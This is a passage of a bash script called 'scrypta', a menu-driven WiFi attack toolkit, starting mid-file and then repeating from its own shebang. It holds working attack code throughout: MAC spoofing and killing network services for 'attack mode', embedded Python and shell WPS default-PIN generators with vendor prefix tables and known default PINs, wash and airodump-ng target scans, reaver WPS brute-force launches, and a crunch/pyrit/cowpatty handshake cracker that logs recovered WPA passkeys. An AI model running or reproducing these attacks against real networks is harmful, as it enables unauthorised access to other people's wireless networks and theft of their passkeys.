1424. echo $RED"Characters, digits, symbols to be used in the passwords$STAND: $CharacterSet"
1425. echo $RED"Other crunch commands?$STAND: $OptionalCrunchOptions"
1426. echo $RED"Capture file location, name, extension$STAND: $CapNameLocation"
1427. echo $RED"essid$STAND: $essid"
1428. echo
1429. echo $RED"Commands to launch:"
1430. echo "==================="
1431. echo $STAND"crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid"
1432. echo
1433. # Launch chosen commands/options
1434. #################################
1435. read -p $GREEN"Press enter to start"$STAND
1436. clear
1437. crunch $PasswordLengthMin $PasswordLengthMax $CharacterSet $OptionalCrunchOptions | pyrit -e $essid -i - -o - passthrough | cowpatty -d - -r $CapNameLocation -s $essid
1438. fi
1439. ;;
1440. 7)
1441. ###########################
1442. # Show Recovered Passkeys #
1443. ###########################
1444. gnome-open $HOME/scrypta/Recovered-WPA-Passkeys.txt
1445. ;;
1446. 8)
1447. ##############################################################################
1448. # Check In Recovered-WPA-Passkeys.txt To See If You Already Have The Passkey #
1449. ##############################################################################
1450. ###################
1451. # Passkey Checker #
1452. ###################
1453. clear
1454. echo $RED"How would you like to search."
1455. echo $GREEN"[1]$BLUE = Search using the bssid."
1456. echo $GREEN"[2]$BLUE = Search using the essid."
1457. echo $GREEN"[0]$BLUE = Return To Previous Menu."
1458. echo $GREEN"1, 2 or 0?"$STAND
1459. read option
1460.  
1461. if [[ $option == "1" ]]; then
1462. while true
1463. do
1464. echo -n $GREEN"Please input the bssid of the access point you would like to check for?$STAND: "
1465. read -e SEARCHbssid
1466. grep -B 1 -A 2 $SEARCHbssid $HOME/scrypta/Recovered-WPA-Passkeys.txt
1467. echo
1468. echo -n "Would you like to search again? (y or n): "
1469. read -e CONFIRM
1470. case $CONFIRM in
1471. n|N|NO|no|No)
1472. break ;;
1473. *) echo ""
1474. esac
1475. done
1476. fi
1477. if [[ $option == "2" ]]; then
1478. while true
1479. do
1480. echo -n $GREEN"Please input the essid of the access point you would like to check for?$STAND: "
1481. read -e SEARCHessid
1482. grep -A 3 $SEARCHessid $HOME/scrypta/Recovered-WPA-Passkeys.txt
1483. echo
1484. echo -n "Would you like to search again? (y or n): "
1485. read -e CONFIRM
1486. case $CONFIRM in
1487. n|N|NO|no|No)
1488. break ;;
1489. *) echo ""
1490. esac
1491. done
1492. fi
1493. if [[ $option == "0" ]]; then
1494. echo "Returning To Menu"
1495. fi
1496. ;;
1497. 0) exit 0;;
1498. *) echo "You've chosen an invalid option, please choose again";
1499. echo "Press [Enter] to continue. . ." ; read ;;
1500. esac
1501. done#!/bin/bash
1502.  
1503.  
1504.  
1505. RED=$(tput setaf 1 && tput bold)
1506. GREEN=$(tput setaf 2 && tput bold)
1507. STAND=$(tput sgr0)
1508. BLUE=$(tput setaf 6 && tput bold)
1509.  
1510. while :
1511. do
1512.  
1513. ###### Create scrypta storage folder if it doeasn't exist ######
1514.  
1515. if [ -d $HOME/scrypta ];
1516. then
1517. echo ""
1518. else
1519. mkdir $HOME/scrypta
1520. mkdir $HOME/scrypta/temp
1521. mkdir $HOME/scrypta/Captured_Handshakes
1522. mkdir $HOME/scrypta/Client_Scans
1523. fi
1524.  
1525. ###### Delete Missed Files In The Temp Directory ######
1526.  
1527. rm $HOME/scrypta/temp/*.txt &> /dev/null
1528. rm $HOME/scrypta/temp/*.py &> /dev/null
1529. rm $HOME/scrypta/temp/*.ivs &> /dev/null
1530. rm $HOME/scrypta/temp/*.cap &> /dev/null
1531. rm $HOME/scrypta/temp/*.xor &> /dev/null
1532. rm $HOME/scrypta/temp/*.csv &> /dev/null
1533. rm $HOME/scrypta/temp/*.netxml &> /dev/null
1534. rm $HOME/scrypta/temp/arp-packet &> /dev/null
1535. rm $HOME/scrypta/temp/*.sh &> /dev/null
1536.  
1537. ###### START OF: DETECT mon0 MAC ADDRESS AND THEN DISPLAY SYSTEM MODE STATUS ######
1538.  
1539. mon0mac=$(ip addr | grep "radiotap" | cut -c 30-46)
1540.  
1541. if [ -s $mon0mac ]
1542. then
1543. MonitorModeStatus=$(echo Networking Mode Enabled)
1544. else
1545. MonitorModeStatus=$(echo Attack Mode Enabled)
1546. fi
1547.  
1548. ###### System Environment Options Menu ######
1549. clear
1550. echo $RED"#########################################"
1551. echo "# $STAND scrypta $RED#"
1552. echo "#########################################"
1553. echo "# #"
1554. echo "#$GREEN [1]$BLUE WiFi Adapter Selection $RED#"
1555. echo "#$GREEN [2]$BLUE Enable Attack Or Networking Mode $RED#"
1556. echo "#$GREEN [3]$BLUE Attack A WPS Enabled Access Point $RED#"
1557. echo "#$GREEN [4]$BLUE Capture WPA/WPA2 Handshake $RED#"
1558. echo "#$GREEN [5]$BLUE WEP Attacks $RED#"
1559. echo "#$GREEN [6]$BLUE Attack Handshake.cap Files $RED#"
1560. echo "#$GREEN [7]$BLUE Show Recovered Passkeys $RED#"
1561. echo "#$GREEN [8]$BLUE Recovered Passkey Checker $RED#"
1562. echo "# #"
1563. echo "#########################################"
1564. echo ""
1565. echo "Chosen Interface$STAND: $wlanX"
1566. echo $RED"System Mode$STAND: $MonitorModeStatus"
1567. echo $RED"MAC address for mon0$STAND: $mon0mac"
1568. echo ""
1569. read -s -n1 -p $GREEN"Please choose an option?$STAND: " ChosenOption
1570. echo
1571. case $ChosenOption in
1572.  
1573. 1)
1574. ###### [1] START OF: CHOOSE A WIFI ADAPTER ######
1575.  
1576. cd $HOME/scrypta/temp
1577. clear
1578. Presented_WiFi_Adapters=$(airmon-ng | grep "wlan" | cut -c 1-5 | nl -ba -w 1 -s ": ")
1579. clear
1580. echo $RED"Available WiFi Adapters.$STAND"
1581. echo ""
1582. echo "$Presented_WiFi_Adapters"
1583. echo ""
1584. read -s -n1 -p $GREEN"Please input the number of your chosen WiFi adapter:$STAND " grep_Line_Number
1585. wlanX=$(echo $Presented_WiFi_Adapters | sed -n ""$grep_Line_Number"p" | cut -c 4-8)
1586. echo ""
1587. echo ""
1588. echo $RED"You've chosen:$STAND $wlanX"
1589. sleep 1
1590. cd
1591.  
1592. ;;
1593.  
1594. ###### [1] END OF: CHOOSE A WIFI ADAPTER ######
1595.  
1596. 2)
1597. ###### [2] START OF: ENABLE NETWORKING OR ATTACK MODE ######
1598.  
1599. clear
1600. echo $RED"#########################################"
1601. echo "# #"
1602. echo "# $GREEN[1]$BLUE Enable Networking Mode $RED #"
1603. echo "# $GREEN[2]$BLUE Enable Attack Mode $RED #"
1604. echo "# $GREEN[0]$BLUE Return To Main Menu $RED #"
1605. echo "# #"
1606. echo "#########################################$STAND"
1607. echo ""
1608. read -s -n1 -p $GREEN"Choose an option, 1 or 2?:$STAND " option
1609. if [[ $option == "1" ]]; then
1610. clear
1611. echo $RED"Putting the system into networking mode$STAND"
1612. airmon-ng stop mon5 > /dev/null
1613. airmon-ng stop mon4 > /dev/null
1614. airmon-ng stop mon3 > /dev/null
1615. airmon-ng stop mon2 > /dev/null
1616. airmon-ng stop mon1 > /dev/null
1617. airmon-ng stop mon0 > /dev/null
1618. airmon-ng stop wlanX
1619. echo $RED"Please wait...$STAND"
1620. ifconfig $wlanX down
1621. ifconfig $wlanX down
1622. wlanFakeMAC=$(macchanger -r $wlanX | grep "New" | cut -c 16-32)
1623. ifconfig $wlanX hw ether $wlanFakeMAC
1624. ifconfig $wlanX up
1625. sleep 1
1626. service network-manager start
1627. echo ""
1628. echo $RED"Networking mode should now be enabled, A fake MAC address has also been set.$STAND"
1629. sleep 3
1630. fi
1631.  
1632. if [[ $option == "2" ]]; then
1633. clear
1634. echo $RED"Putting the system into attack mode$STAND"
1635. echo $RED"Please wait...$STAND"
1636. echo ""
1637. airmon-ng stop mon5 > /dev/null
1638. airmon-ng stop mon4 > /dev/null
1639. airmon-ng stop mon3 > /dev/null
1640. airmon-ng stop mon2 > /dev/null
1641. airmon-ng stop mon1 > /dev/null
1642. airmon-ng stop mon0 > /dev/null
1643. ifconfig $wlanX down
1644.  
1645. read -s -n1 -p $GREEN"Would you like to disable processes that might cause issue's Y/n?.$STAND " KillProcesses
1646. if [[ $KillProcesses == "Y" || $KillProcesses == "y" ]]; then
1647. echo ""
1648. echo $RED"Please wait...$STAND"
1649. kill `pidof NetworkManager`
1650. sleep 2
1651. kill `pidof wpa_supplicant`
1652. sleep 2
1653. fi
1654.  
1655. ifconfig $wlanX up
1656. sleep 1
1657. airmon-ng start $wlanX
1658. echo $RED"Please wait...$STAND"
1659. sleep 1
1660. ifconfig $wlanX down
1661. sleep 1
1662. ifconfig mon0 down
1663. wlanMAC1=$(macchanger -r $wlanX | grep "New" | cut -c 16-32)
1664. ifconfig $wlanX hw ether $wlanMAC1
1665. echo ""
1666. sleep 1
1667. macchanger --mac $wlanMAC1 mon0 > /dev/null
1668. ifconfig $wlanX up
1669. ifconfig mon0 up
1670. echo ""
1671. echo $RED"MAC address for $wlanX:$STAND"
1672. macchanger -s $wlanX
1673. echo ""
1674. echo $RED"MAC address for mon0:$STAND"
1675. macchanger -s mon0
1676. echo ""
1677. echo $RED"A Random MAC address has been set,$STAND "$wlanX"$RED and$STAND mon0$RED should now have the same fake MAC address.$STAND"
1678. echo ""
1679. echo $RED"Attack Mode Should Now Be Enabled.$STAND"
1680. sleep 3
1681. fi
1682.  
1683. ;;
1684.  
1685. ###### [2] END OF: ENABLE NETWORKING OR ATTACK MODE ######
1686.  
1687. 3)
1688. ###### [3] Attack A WPS Enabled Access Point ######
1689. cd $HOME/scrypta/temp
1690. clear
1691. ############## Start Of Create WPSpin.py And easybox_wps.py ##############
1692.  
1693. ############## WPSpin.py ##############
1694. echo '
1695. import sys
1696.  
1697. VERSION = 1
1698. SUBVERSION = 0
1699.  
1700. def usage():
1701. print "[+] WPSpin %d.%d " % (VERSION, SUBVERSION)
1702. print "[*] Usage : python WPSpin.py 123456"
1703. sys.exit(0)
1704.  
1705. def wps_pin_checksum(pin):
1706. accum = 0
1707.  
1708. while(pin):
1709. accum += 3 * (pin % 10)
1710. pin /= 10
1711. accum += pin % 10
1712. pin /= 10
1713. return (10 - accum % 10) % 10
1714.  
1715. try:
1716. if (len(sys.argv[1]) == 6):
1717. p = int(sys.argv[1] , 16) % 10000000
1718. print "[+] WPS pin might be : %07d%d" % (p, wps_pin_checksum(p))
1719. else:
1720. usage()
1721. except Exception:
1722. usage()
1723. ' > WPSpin.py
1724.  
1725. ############## easybox_wps.py ##############
1726.  
1727. echo '#!/usr/bin/env python
1728. import sys, re
1729.  
1730. def gen_pin (mac_str, sn):
1731. mac_int = [int(x, 16) for x in mac_str]
1732. sn_int = [0]*5+[int(x) for x in sn[5:]]
1733. hpin = [0] * 7
1734.  
1735. k1 = (sn_int[6] + sn_int[7] + mac_int[10] + mac_int[11]) & 0xF
1736. k2 = (sn_int[8] + sn_int[9] + mac_int[8] + mac_int[9]) & 0xF
1737. hpin[0] = k1 ^ sn_int[9];
1738. hpin[1] = k1 ^ sn_int[8];
1739. hpin[2] = k2 ^ mac_int[9];
1740. hpin[3] = k2 ^ mac_int[10];
1741. hpin[4] = mac_int[10] ^ sn_int[9];
1742. hpin[5] = mac_int[11] ^ sn_int[8];
1743. hpin[6] = k1 ^ sn_int[7];
1744. pin = int("%1X%1X%1X%1X%1X%1X%1X" % (hpin[0], hpin[1], hpin[2], hpin[3], hpin[4], hpin[5], hpin[6]), 16) % 10000000
1745.  
1746. # WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or
1747. # http://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc
1748. accum = 0
1749. t = pin
1750. while (t):
1751. accum += 3 * (t % 10)
1752. t /= 10
1753. accum += t % 10
1754. t /= 10
1755. return "%i%i" % (pin, (10 - accum % 10) % 10)
1756.  
1757. def main():
1758. if len(sys.argv) != 2:
1759. sys.exit("usage: easybox_wps.py [BSSID]\n eg. easybox_wps.py 38:22:9D:11:22:33\n")
1760.  
1761. mac_str = re.sub(r"[^a-fA-F0-9]", "", sys.argv[1])
1762. if len(mac_str) != 12:
1763. sys.exit("check MAC format!\n")
1764.  
1765. sn = "R----%05i" % int(mac_str[8:12], 16)
1766. print "derived serial number:", sn
1767. print "SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c" % (mac_str[6], mac_str[7], mac_str[8], mac_str[9], sn[5], sn[9])
1768. print "WPS pin:", gen_pin(mac_str, sn)
1769.  
1770. if __name__ == "__main__":
1771. main()
1772. ' > easybox_wps.py
1773.  
1774. ############## End Of Create WPSpin.py And easybox_wps.py ##############
1775.  
1776. ############## Start Of Target Selection And Pin Generation ##############
1777.  
1778. clear
1779. echo $RED"Scanning for WPS-enabled access points, press Ctrl+c on the wash screen to stop the scan and choose a target."$STAND
1780. read -p $GREEN"Press [Enter] to launch the scan.$STAND"
1781. xterm -geometry 111x24+650+0 -l -lf WashScan.txt -e wash -i mon0
1782. sed -i ''1,6d';'$d'' WashScan.txt
1783.  
1784. ############## Start Of Loop Section ##############
1785.  
1786. while true
1787. do
1788.  
1789. Presented_APs=$(cat WashScan.txt | awk '{ print $6 }' | nl -ba -w 1 -s ': ' | sed '$d')
1790. clear
1791. echo $RED"Available Access Points."$STAND
1792. echo ""
1793. echo "$Presented_APs"
1794. echo ""
1795. read -p $GREEN"Please input the number of your chosen target:$STAND " grep_AP_line_number
1796.  
1797. Chosen_AP_Line=$(cat WashScan.txt | sed -n ""$grep_AP_line_number"p")
1798. AP_essid=$(echo $Chosen_AP_Line | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
1799. AP_bssid=$(echo $Chosen_AP_Line | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
1800. AP_channel=$(echo $Chosen_AP_Line | awk '{ print $2 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
1801. PinMAC1=$(echo $AP_bssid | sed 's/://g' | cut -c 7-12)
1802. PinMAC2=$(echo $AP_bssid | sed 's/://g' | cut -c 1-6)
1803. WPSpin1=`python WPSpin.py $PinMAC1 | awk '{ print $7 }'`
1804. WPSpin2=`python WPSpin.py $PinMAC2 | awk '{ print $7 }'`
1805. easybox=`python easybox_wps.py $AP_bssid | grep "WPS pin" | cut -c 10-17`
1806.  
1807. ############## End Of Target Selection And Pin Generation ##############
1808.  
1809. ############## Start Of Choose A MAC Address Options ##############
1810.  
1811. clear
1812. echo $RED"Please choose a MAC address option:$STAND"
1813. echo $GREEN"[1]$BLUE = Auto Set A Random MAC address.$STAND"
1814. echo $GREEN"[2]$BLUE = Input Any MAC Address You Want To Use.$STAND"
1815. echo $GREEN"[3]$BLUE = Continue Without Changing The MAC Address.$STAND"
1816. read -s -n1 -p $GREEN"Please choose 1, 2, or 3?$STAND: " option
1817.  
1818. if [[ $option == "1" ]]; then
1819. clear
1820. echo $RED"Auto Setting A Random MAC Address.$STAND"
1821. echo $RED"Please wait..."$STAND
1822. ifconfig $wlanX down
1823. ifconfig $wlanX down
1824. sleep 1
1825. ifconfig mon0 down
1826. wlanMAC2=`macchanger -r $wlanX | grep "New" | cut -c 16-32`
1827. ifconfig $wlanX hw ether $wlanMAC2
1828. echo ""
1829. sleep 1
1830. macchanger --mac $wlanMAC2 mon0
1831. ifconfig $wlanX up
1832. ifconfig mon0 up
1833. echo ""
1834. echo $RED"MAC address for$STAND $wlanX:"
1835. macchanger -s $wlanX
1836. echo ""
1837. echo $RED"MAC address for$STAND mon0:"
1838. macchanger -s mon0
1839. echo ""
1840. echo $RED"A Random MAC address has been set,$STAND $wlanX$RED and$STAND mon0$RED should now have the same fake MAC address."
1841. echo ""
1842. sleep 4
1843. fi
1844.  
1845. if [[ $option == "2" ]]; then
1846. clear
1847. echo $RED"Set A User specified MAC Address.$STAND"
1848. echo $RED"Please wait..."$STAND
1849. ifconfig $wlanX down
1850. ifconfig mon0 down
1851. echo ""
1852. echo $RED"Setting a random MAC address."$STAND
1853. macchanger -r $wlanX
1854. echo ""
1855. read -p $GREEN"Input any mac address you want to use?.$STAND " SpecifiedInterfaceMAC
1856. ifconfig $wlanX hw ether $SpecifiedInterfaceMAC
1857. macchanger --mac $SpecifiedInterfaceMAC mon0
1858. ifconfig $wlanX up
1859. ifconfig mon0 up
1860. echo ""
1861. echo $RED"MAC address for$STAND $wlanX:"$STAND
1862. macchanger -s $wlanX
1863. echo ""
1864. echo $RED"MAC address for$STAND mon0:"$STAND
1865. macchanger -s mon0
1866. echo ""
1867. sleep 2
1868. echo $RED"A User specified MAC Address has been set, $wlanX and $monX should now have the same fake MAC address."$STAND
1869. echo ""
1870. echo $RED"Attack Mode Should Now Be Enabled."$STAND
1871. sleep 2
1872. fi
1873.  
1874. if [[ $option == "3" ]]; then
1875. echo ""
1876. fi
1877.  
1878. ############## End Of Choose A MAC Address Options ##############
1879.  
1880. ############## Start Of Review Information ##############
1881.  
1882. clear
1883. echo $RED"Review Information."$STAND
1884. echo ""
1885. echo $RED"You've chosen$BLUE essid$RED:$STAND $AP_essid"
1886. echo $RED"You've chosen$BLUE bssid$RED:$STAND $AP_bssid"
1887. echo $RED"You've chosen$BLUE Channel$RED:$STAND $AP_channel"
1888. echo ""
1889. echo $RED"Possible$BLUE WPS Pin1$RED:$STAND $WPSpin1"
1890. echo $RED"Possible$BLUE WPS Pin2$RED:$STAND $WPSpin2"
1891. echo $RED"Possible$BLUE easybox Pin$RED:$STAND $easybox"
1892. ############## Start Of WPSPIN-1.3 Default Pin Generater ##############
1893.  
1894. ESSID=$(echo $AP_essid)
1895. BSSID=$(echo $AP_bssid)
1896.  
1897. FUNC_CHECKSUM(){
1898. ACCUM=0
1899.  
1900. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
1901. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
1902. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
1903. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
1904. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
1905. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
1906. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`
1907.  
1908. DIGIT=`expr $ACCUM '%' 10`
1909. CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10`
1910.  
1911. PIN=`expr $PIN '+' $CHECKSUM`
1912. ACCUM=0
1913.  
1914. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'`
1915. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
1916. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
1917. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
1918. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
1919. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
1920. ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'`
1921. ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1 ')' '%' 10 ')'`
1922.  
1923. RESTE=`expr $ACCUM '%' 10`
1924. }
1925.  
1926. CHECKBSSID=$(echo $BSSID | cut -d ":" -f1,2,3 | tr -d ':')
1927.  
1928. FINBSSID=$(echo $BSSID | cut -d ':' -f4-)
1929.  
1930. MAC=$(echo $FINBSSID | tr -d ':')
1931.  
1932. CONVERTEDMAC=$(printf '%d\n' 0x$MAC)
1933.  
1934. FINESSID=$(echo $ESSID | cut -d '-' -f2)
1935.  
1936. PAREMAC=$(echo $FINBSSID | cut -d ':' -f1 | tr -d ':')
1937.  
1938. CHECKMAC=$(echo $FINBSSID | cut -d ':' -f2- | tr -d ':')
1939.  
1940. MACESSID=$(echo $PAREMAC$FINESSID)
1941.  
1942. STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'`
1943.  
1944. PIN=`expr 10 '*' $STRING`
1945.  
1946. FUNC_CHECKSUM
1947.  
1948. PINWPS1=$(printf '%08d\n' $PIN)
1949.  
1950. STRING2=`expr $STRING '+' 8`
1951. PIN=`expr 10 '*' $STRING2`
1952.  
1953. FUNC_CHECKSUM
1954.  
1955. PINWPS2=$(printf '%08d\n' $PIN)
1956.  
1957. STRING3=`expr $STRING '+' 14`
1958. PIN=`expr 10 '*' $STRING3`
1959.  
1960. FUNC_CHECKSUM
1961.  
1962. PINWPS3=$(printf '%08d\n' $PIN)
1963.  
1964. if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] && [[ "$CHECKBSSID" = "04C06F" || "$CHECKBSSID" = "202BC1" || "$CHECKBSSID" = "285FDB" || "$CHECKBSSID" = "80B686" || "$CHECKBSSID" = "84A8E4" || "$CHECKBSSID" = "B4749F" || "$CHECKBSSID" = "BC7670" || "$CHECKBSSID" = "CC96A0" ]] && [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]];
1965.  
1966. then
1967.  
1968. CONVERTEDMACESSID=$(printf '%d\n' 0x$MACESSID)
1969.  
1970. RAIZ=`expr '(' $CONVERTEDMACESSID '%' 10000000 ')'`
1971.  
1972. STRING4=`expr $RAIZ '+' 7`
1973.  
1974. PIN=`expr 10 '*' $STRING4`
1975.  
1976. FUNC_CHECKSUM
1977.  
1978. PINWPS4=$(printf '%08d\n' $PIN)
1979.  
1980. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS4 "
1981. PIN4REAVER=$PINWPS4
1982. else
1983. case $CHECKBSSID in
1984. 04C06F | 202BC1 | 285FDB | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0)
1985. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1
1986. $RED"Other Possible Pin"$RED:$STAND $PINWPS2
1987. $RED"Other Possible Pin"$RED:$STAND $PINWPS3"
1988. PIN4REAVER=$PINWPS1
1989. ;;
1990. 001915)
1991. echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
1992. PIN4REAVER=12345670
1993. ;;
1994. 404A03)
1995. echo -e "$RED"Other Possible Pin"$RED:$STAND 11866428"
1996. PIN4REAVER=11866428
1997. ;;
1998. F43E61 | 001FA4)
1999. echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
2000. PIN4REAVER=12345670
2001. ;;
2002. 001A2B)
2003. if [[ $ESSID =~ ^WLAN_[[:xdigit:]]{4}[[:blank:]]*$ ]];
2004. then
2005. echo -e "$RED"Other Possible Pin"$RED:$STAND 88478760"
2006. PIN4REAVER=88478760
2007. else
2008. echo -e "PIN POSSIBLE... > $PINWPS1"
2009. PIN4REAVER=$PINWPS1
2010. fi
2011. ;;
2012. 3872C0)
2013. if [[ $ESSID =~ ^JAZZTEL_[[:xdigit:]]{4}[[:blank:]]*$ ]];
2014. then
2015. echo -e "$RED"Other Possible Pin"$RED:$STAND 18836486"
2016. PIN4REAVER=18836486
2017. else
2018. echo -e "PIN POSSIBLE > $PINWPS1"
2019. PIN4REAVER=$PINWPS1
2020. fi
2021. ;;
2022. FCF528)
2023. echo -e "$RED"Other Possible Pin"$RED:$STAND 20329761"
2024. PIN4REAVER= 20329761
2025. ;;
2026. 3039F2)
2027. echo -e "several possible PINs, ranked in order>
2028. 16538061 16702738 18355604 88202907 73767053 43297917"
2029. PIN4REAVER=16538061
2030. ;;
2031. A4526F)
2032. echo -e "several possible PINs, ranked in order>
2033. 16538061 88202907 73767053 16702738 43297917 18355604 "
2034. PIN4REAVER=16538061
2035. ;;
2036. 74888B)
2037. echo -e "several possible PINs, ranked in order>
2038. 43297917 73767053 88202907 16538061 16702738 18355604"
2039. PIN4REAVER=43297917
2040. ;;
2041. DC0B1A)
2042. echo -e "several possible PINs, ranked in order>
2043. 16538061 16702738 18355604 88202907 73767053 43297917"
2044. PIN4REAVER=16538061
2045. ;;
2046. 5C4CA9 | 62A8E4 | 62C06F | 62C61F | 62E87B | 6A559C | 6AA8E4 | 6AC06F | 6AC714 | 6AD167 | 72A8E4 | 72C06F | 72C714 | 72E87B | 723DFF | 7253D4)
2047. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 "
2048. PIN4REAVER=$PINWPS1
2049. ;;
2050. 002275)
2051. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
2052. PIN4REAVER=$PINWPS1
2053. ;;
2054. 08863B)
2055. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
2056. PIN4REAVER=$PINWPS1
2057. ;;
2058. 001CDF)
2059. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
2060. PIN4REAVER=$PINWPS1
2061. ;;
2062. 00A026)
2063. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
2064. PIN4REAVER=$PINWPS1
2065. ;;
2066. 5057F0)
2067. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
2068. PIN4REAVER=$PINWPS1
2069. ;;
2070. C83A35 | 00B00C | 081075)
2071. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
2072. PIN4REAVER=$PINWPS1
2073. ;;
2074. E47CF9 | 801F02)
2075. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
2076. PIN4REAVER=$PINWPS1
2077. ;;
2078. 0022F7)
2079. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
2080. PIN4REAVER=$PINWPS1
2081. ;;
2082. *)
2083. echo -e $RED"Other Possible Pin$RED:$STAND $PINWPS1"
2084. PIN4REAVER=$PINWPS1
2085. ;;
2086. esac
2087. fi
2088.  
2089. ############## End Of WPSPIN-1.3 Default Pin Generater ##############
2090.  
2091. echo ""
2092. echo $RED"MAC address for$STAND mon0:"$STAND
2093. macchanger -s mon0
2094. sleep 4
2095.  
2096. ############## End Of Review Information ##############
2097.  
2098. ############## Start Of Scan For Clients And Store Collected MAC Addresses Option ##############
2099. echo ""
2100. read -s -n1 -p $GREEN"Would you like to scan for clients connected to the target access point? Y/n:$STAND " ClientScan
2101.  
2102. if [[ $ClientScan == "Y" || $ClientScan == "y" ]]; then
2103. xterm -geometry 111x24+650+0 -l -lf temp1.txt -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0
2104. cat temp1.txt | tail -10 | sed 'N;$!P;$!D;$d' | sed -n '/STATION/,$p' >> ClientScan-$AP_bssid.txt
2105. mv ClientScan-$AP_bssid.txt $HOME/scrypta/Client_Scans/ClientScan-$AP_bssid.txt
2106. rm temp1.txt
2107. echo ""
2108. echo ""
2109. echo $RED"Collected scan data is stored in$STAND ClientScan-$AP_bssid.txt $RED Location$STAND: $HOME/scrypta/Client_Scans"
2110. echo ""
2111. read -p $GREEN"Press [Enter] to continue.$STAND"
2112. fi
2113.  
2114. if [[ $ClientScan == "N" || $ClientScan == "n" ]]; then
2115. echo ""
2116. fi
2117. ############## End Of Scan For Clients And Store Collected MAC Addresses Option ##############
2118.  
2119. ############## Start Of Reaver Attacks And Store Recovered Passkey ##############
2120.  
2121. clear
2122. echo $RED"Choose an attack option:"$STAND
2123. echo $GREEN"[1]$BLUE = Reaver + Auto Generated WPS Pin"$STAND
2124. echo $GREEN"[2]$BLUE = Reaver (Customisable Options)"$STAND
2125. echo
2126. read -s -n1 -p $GREEN"Please choose an option?$STAND: " yourch
2127. echo
2128. case $yourch in
2129.  
2130. 1)
2131. clear
2132. echo $RED"Choose a pin:"
2133. echo $GREEN"[1]$BLUE WPS Pin1 = $WPSpin1"
2134. echo $GREEN"[2]$BLUE WPS Pin2 = $WPSpin2"
2135. echo $GREEN"[3]$BLUE EasyBox Pin = $easybox"
2136. echo $GREEN"[4]$BLUE Other Pins = $PIN4REAVER"
2137. read -s -n1 -p $GREEN"Please choose 1, 2, 3, or 4?$STAND: " PinOption
2138.  
2139. if [[ $PinOption == "1" ]]; then
2140. clear
2141. echo $RED"Reaver Attack Command:"$STAND
2142. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin1 -d 2 -t 2 -T 2 -vv"
2143. echo ""
2144. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
2145. clear
2146. reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin1 -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
2147. rm reaver.txt
2148. echo ""
2149. fi
2150.  
2151. if [[ $PinOption == "2" ]]; then
2152. clear
